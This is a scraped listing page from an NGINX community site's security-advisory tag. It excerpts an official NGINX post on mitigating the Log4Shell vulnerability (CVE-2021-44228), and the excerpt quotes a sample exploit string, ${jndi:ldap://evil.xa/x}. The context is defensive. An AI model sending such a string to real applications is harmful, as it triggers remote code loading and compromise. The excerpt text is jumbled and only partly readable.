We're sorry but nginx-community doesn't work properly without JavaScript enabled. Please enable it to continue.
开源社区
首页
文章
问答
文档
软件下载
发现更多
三方插件
技术支持
电子书
公开课
社区贡献榜
关于我们
登录
注册
NGINX
负载均衡
JavaScript
NGINX Unit
Kubernetes
微服务
容器
NGINX系列
WAF
Node.js
Go(编程语言)
服务网格(Service Mesh)
HTTP/3_专栏
版本发布
# 安全公告
暂无描述
关注标签
1人关注
文章
问答
排序
热门
最新
NGINX官方账号
发布于2021-12-27 11:00
NGINX 助力缓解 log4j 漏洞 (CVE-2021-44228)
中发现了一个非常严重的Log4Shell是什么?2.16修复了该漏洞。)Log4Shell是指针对该漏洞的攻击行为。但是,这一漏洞是什么呢?为何它如此重要?如CVE中所述,Apachelog4jJava库未能正确地对输入进行验证。log4j库与Java运行时包含的Java命名和目录接口(JNDI)这一特性可用于执行远程查找,这样就可以从外部数据源获取数据(例如从LDAP获取用户名或从DNS获取IP地址),然后再将其加入某个日志条目中。然而,远程攻击者会趁机劫持JNDI来执行其编写的Java代码。下图形象地展示了攻击过程。${jndi:ldap://evil.xa/x} 和完全不会。NGINX本身不会受到这一漏洞攻击的影响,因为它采用C语言编写而成,没有使用Java或任何基于Java的库。有关所有F5和NGINX的产品针对 如上所述,攻击者必须将用于攻击的字符串插在HTTP请求中某个位置,并发送给目标应用。NGINX提供了多种用于扫描入向请求的工具,以便识别入侵迹象(IOC)
点赞
6
浏览
2.6k
NGINX官方账号
发布于2023-05-18 11:10
NGINX安全修复建议
原文链接:https:nginx.orgensecurity_advisories.html发现任何 nginx 安全问题,可以通过邮件的方式发送至 security-alert@nginx.org所
点赞
0
浏览
3.9k
发表文章
提问
社区达人
成为达人
陶辉
暂无个人介绍
关注
洪志道
暂无个人介绍
关注
皮皮鲁
暂无个人介绍
关注
加菲
暂无个人介绍
关注
lwl
暂无个人介绍
关注
相关文章
NGINX安全修复建议
原文链接:https:nginx.orgensecurity_advisories.html发现任何 nginx 安全问题,可以通过邮件的方式发送至 security-alert@nginx.org所
NGINX官方账号
发布于2023-05-18 11:10
保持联系
微信公众号
加入微信群
获取商业支持
了解商业产品和专业支持服务
加入邮件列表
向开发组提交代码或反馈意见